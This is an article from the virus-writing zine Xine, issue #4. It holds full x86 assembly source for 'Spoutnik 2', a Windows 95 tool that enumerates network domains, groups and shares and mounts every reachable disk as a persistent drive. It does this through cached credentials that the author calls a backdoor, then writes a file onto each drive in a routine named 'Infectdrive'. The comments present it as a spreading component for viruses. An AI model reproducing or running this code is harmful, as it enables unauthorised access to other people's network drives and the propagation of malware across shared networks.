Copy Link
Add to Bookmark
Report
Xine - issue #4 - Phile 302
/-----------------------------\
| Xine - issue #4 - Phile 302 |
\-----------------------------/
;
; This scanner was build on this principe(ikx)
;
; if domain-server-generic found then scan again
; if connectable disk found then mount it
;
; This small application connect every sharable ressource on the network,
; despite of no password, windows seems to connect anyway the ressource.
; This was not previewved initially. Windows himself find and take
; the password from the cache ?
; Yeah, it's a win95 backD00r, it make things more simple but it hide
; password to the user himself, even the virus don't know the password
;
; This program show how to connect a drive (ikx)
; This program have also a fixed memory for scanning each type, then it
; can't perform a 100% true full tree, he will be limited somewhere...
;
; Spoutnik 3 will fix this problem
;
; This part of code was coded under windows95, tested on windows98
; KRRRASHED on windows NT
; So NT users, don't panic and reformat your drive, install windows95 and
; after you will be able to use that program
; Else , you can debug this program and send me the working version for NT
;
; I will not do it myself, I'm in time deficit you know....
;
; Greetz(×kx): Frederrico <- the Belgian Beer Killer! ;)
; and some s0 UnD4RGRooND PO3pl3 th4t N0bodY kn0\X/
;
; hope you enjoy the Code
; Ikx/Ikx(ikx1999)
.386
locals
.model flat
;Define the needed external functions and constants here.
extrn ExitProcess:PROC
extrn MessageBoxA:Proc
extrn WNetOpenEnumA:Proc
extrn WNetCloseEnum:Proc
extrn WNetEnumResourceA:Proc
extrn WNetAddConnection2A:Proc
extrn WNetCancelConnection2A:Proc
extrn GetCommandLineA:Proc
extrn MessageBoxA:Proc
extrn HeapCreate:Proc
extrn HeapAlloc:Proc
extrn HeapDestroy:Proc
extrn GetLastError:Proc
extrn CreateFileA:Proc
extrn WriteFile:Proc
extrn _lclose:Proc
.data ;the data area
Tempdrive: db 'Z'+1,':' ; but I will
tmpflag: db 0
Tempfile: db 'create.txt',0
iobytes: dd 0
Handle: dd 0
MemPointer: dd 0
MemHandle: dd 0
MemPointer2: dd 0
MemHandle2: dd 0
MemPointer3: dd 0
MemHandle3: dd 0
MemPointer4: dd 0
MemHandle4: dd 0
Password: dd 20 dup (0) ; hahaha I removed my password
db 800 dup (?)
.code ; executable code starts here
HOST:
Starthere:
call GetCommandLineA ; look if any password entered
mov esi,eax
dothattozero:
inc esi
cmp byte ptr [esi],20h ; if space then so
je thengother
cmp byte ptr [esi],0 ; if nothing then set default
jne dothattozero
jmp dothatanyway
thengother:
mov edi,offset Password ; set password
gototheree:
inc esi
inc edi
mov al,byte ptr [esi] ; get password characters
cmp al,0
je dothatanyway ; end of paswword ?
mov byte ptr [edi],al
jmp gototheree ; loop
dothatanyway:
mov edx,offset MemPointer ; alloc first memory for
mov ebx,0FFFFh/2 ; scanning
Call Alloc
mov edx,offset MemPointer2
mov ebx,0FFFFh/2
Call Alloc ; memory 2
mov edx,offset MemPointer3 ; memory 3
mov ebx,0FFFFh/2
Call Alloc
mov edx,offset MemPointer4 ; memory4
mov ebx,0FFFFh/2
Call Alloc
dec eax
jc Fini ; can't allocate, then finish!
inc eax
mov eax,0
mov ebx,dword ptr [MemPointer]
call Globalconnection ; open the connection to
; the global networks
jc Fini1 ; in order to scan ressources
Nextone:
mov eax,dword ptr [MemPointer]
Call EnumResource ; get all 1st entries
jc Fini ; generally the Domain
; or Generic
mov esi,dword ptr [MemPointer]
call scanall ; then we scan sub entries
jmp Nextone
scanall:
pushad ; we scan
mov ecx,dword ptr [esi+04] ; look to the Netressource
lea edi,[esi+0Ch] ; structure, looking for
; types...
scaneach:
push edi
push ecx
call scaneachtype ; Now we do the ring scanner
pop ecx
pop edi
add edi,32
loop scaneach
popad ; Ikx
ret
scaneachtype:
cmp dword ptr [edi+8],2 ; Scan for sharing ressource
je Scanshare ; not necessary disk but
; shared directories...
cmp dword ptr [edi+8],1
je Scangroup ; scan the group
cmp dword ptr [edi+8],3
je Infectdrive
cmp dword ptr [edi+8],6
je Scandomain ; scan the domain
ret
Scandomain:
mov ebx,dword ptr [MemPointer2]
mov eax,edi
call Globalconnection ;ask for connection...
jc scandomainfin
scandomain2:
mov eax,dword ptr [MemPointer2]
Call EnumResource ; ask for entries
jc scandomainfin
mov esi,dword ptr [MemPointer2]
call scanall ; scan subentries
jmp scandomain2
scandomainfin:
mov eax,dword ptr [MemPointer2]
call closeenum ; close the ennumeration
ret
Scangroup:
mov ebx,dword ptr [MemPointer3]
mov eax,edi
call Globalconnection ; scan the group
jc scangroupfin
scangroup2:
mov eax,dword ptr [MemPointer3]
Call EnumResource ; ask for entries
jc scangroupfin
mov esi,dword ptr [MemPointer3]
call scanall ; scan sub entries
jmp scangroup2
scangroupfin:
mov eax,dword ptr [MemPointer3]
call closeenum
ret
Scanshare:
cmp dword ptr [edi+20],0
je Nextone ; test if this is a remote things
mov ebx,dword ptr [MemPointer4]
mov eax,edi
call Globalconnection ; scan for sub connections
jc scanusefini ; in machine
scanuse2:
mov eax,dword ptr [MemPointer4]
Call EnumResource ; ask for entries
jc scanusefini
mov esi,dword ptr [MemPointer4]
call scanall
jmp scanuse2
scanusefini:
mov eax,dword ptr [MemPointer4]
call closeenum ; close enumeration
ret
Infectdrive:
mov dword ptr [edi+16],offset Tempdrive ; we have to set
; the Local name as a drive
; letter 'Ex:F: etc etc'
; here I choose to start
; from Z to go to A
dec byte ptr [Tempdrive]
push 0FF000000h ; persistant
push 0 ; default user...
push offset Password ; seems not really need
push edi ; the NEtressource table
Call WNetAddConnection2A ; Now we connect
cmp eax,0
jne Cantconnect
push large 0
push large 80h
push large 1 ; create allways new
push large 0
push large 0
push 80000000h or 40000000h ; create the file in read
push offset Tempdrive
mov byte ptr [tmpflag],'\' ; this just for F:\blabla
Call CreateFileA ; create a file
dec byte ptr [Tempdrive]
mov byte ptr [tmpflag],0
inc eax
jz Disconnect
dec eax
push eax
push 0
push offset iobytes
push 8
push offset Tempfile
push eax
Call WriteFile ; write 8 byte on the file
; close it
Call _lclose
Disconnect:
; push 0 ; NORMALLY WE HAVE TO CANCEL
; push 1 ; THE CONNECTION WHEN FINISH
; push offset Tempdrive
; Call WNetCancelConnection2A
Cantconnect:
inc byte ptr [Tempdrive]
ret
EnumResource:
lea ecx,[eax+8] ; heap organisation...
mov edx,32000
mov dword ptr [ecx],edx ;
push ecx ; buffer size
lea ecx,[eax+12]
push ecx ; buffer = heap +12
mov dword ptr [eax+4],-1
lea ecx,[eax+4]
push ecx ; number of entries = 0FFFFFFFh
push dword ptr [eax] ; handle
Call WNetEnumResourceA
add eax,-1
ret
closeenum:
push dword ptr [eax]
Call WNetCloseEnum
ret
Globalconnection:
mov ecx,2
jmp Netconnection
Contextconnection:
mov ecx,5
Netconnection:
push ebx
push eax
push large 3 ; fwdusage
push large 1 ; fwdtype , get only disks
push ecx ; fwdscope
call WNetOpenEnumA
add eax,-1
ret
Alloc: ; Hacked from Explorer.exe
; given with window95 Chicago
; ver 4.00.950 line#0040D0DE
; **normally** works with
push edx ; NT but allways...
push edx
push 0
push ebx
push 0
Call HeapCreate
pop edx
mov dword ptr [edx],eax
cmp eax,0
jz AllocBad
dec ebx
push ebx
push 8h
push eax
Call HeapAlloc
pop edx
mov dword ptr [edx+4],eax
ret
AllocBad: sub eax,-1
ret
Deloc:
push dword ptr [MemHandle]
Call HeapDestroy
push dword ptr [MemHandle2]
Call HeapDestroy
ret
Fini:
mov eax,dword ptr [MemPointer]
call closeenum ; finish global connection
Fini1:
call Deloc
cmp byte ptr [Tempdrive],'Z'+1
jne thenskipbox
push 0 ; put the small box if nutin
push offset BoxMsg2 ; connected
push offset BoxMsg
push 0
call MessageBoxA
thenskipbox:
push LARGE -1
call ExitProcess ;this simply terminates the program
BoxMsg2: db ' Spoutnik_2^ikx II{IkX}',0
BoxMsg: db ' No ressource connected!',10,13,10,13
db ' Correct syntax: spoutnik (password)',10,13
db ' Ex: spoutnik jennajameson',10,13,10,13
db 'Nota bene:password is not necesseary',10,13
ends
end HOST